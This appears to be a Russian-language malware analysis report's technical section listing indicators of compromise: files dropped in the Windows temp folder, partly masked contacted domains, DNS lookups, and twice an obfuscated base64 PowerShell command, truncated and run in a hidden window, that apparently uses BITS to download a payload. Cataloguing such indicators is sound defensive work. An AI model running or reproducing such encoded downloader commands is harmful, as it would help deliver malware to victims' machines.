Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LgAoACcASQBtAHAAJwArACcAbwAnACsAJwByAHQALQAnACsAJwBNACcAKwAnAG8AZAB1AGwAZQAnACkAIABCAEkAdABzAFQAUgBBAG4AcwBGAGUAUgA7ACQAZwBhAGkAdgB5AG8AZwBnAGkAZQBrAGQAbwBqAHgAYQB1AG0AbABvAGEAbQA9ACcAaAB0AH...
- %WINDIR%\temp\cab7964.tmp
- %WINDIR%\temp\tar7975.tmp
- %WINDIR%\temp\cab8f6f.tmp
- %WINDIR%\temp\tar8f70.tmp
- %WINDIR%\temp\cab90a9.tmp
- %WINDIR%\temp\tar90aa.tmp
- %WINDIR%\temp\caba608.tmp
- %WINDIR%\temp\tara609.tmp
- %WINDIR%\temp\cab7964.tmp
- %WINDIR%\temp\tar7975.tmp
- %WINDIR%\temp\cab8f6f.tmp
- %WINDIR%\temp\tar8f70.tmp
- %WINDIR%\temp\cab90a9.tmp
- %WINDIR%\temp\tar90aa.tmp
- %WINDIR%\temp\caba608.tmp
- %WINDIR%\temp\tara609.tmp
- 'sh####nfoways.com':80
- 'te###.cxyw.net':80
- 'su########eandorganicgarments.com':80
- 'st####g.icuskin.com':80
- http://cr#.#ectigo.com/SectigoRSADomainValidationSecureServerCA.crt
- DNS ASK ra####kaonline.com
- DNS ASK cr#.#ectigo.com
- DNS ASK sh####nfoways.com
- DNS ASK te###.cxyw.net
- DNS ASK su########eandorganicgarments.com
- DNS ASK st####g.icuskin.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LgAoACcASQBtAHAAJwArACcAbwAnACsAJwByAHQALQAnACsAJwBNACcAKwAnAG8AZAB1AGwAZQAnACkAIABCAEkAdABzAFQAUgBBAG4AcwBGAGUAUgA7ACQAZwBhAGkAdgB5AG8AZwBnAGkAZQBrAGQAbwBqAHgAYQB1AG0AbABvAGEAbQA9ACcAaAB0AH...' (со скрытым окном)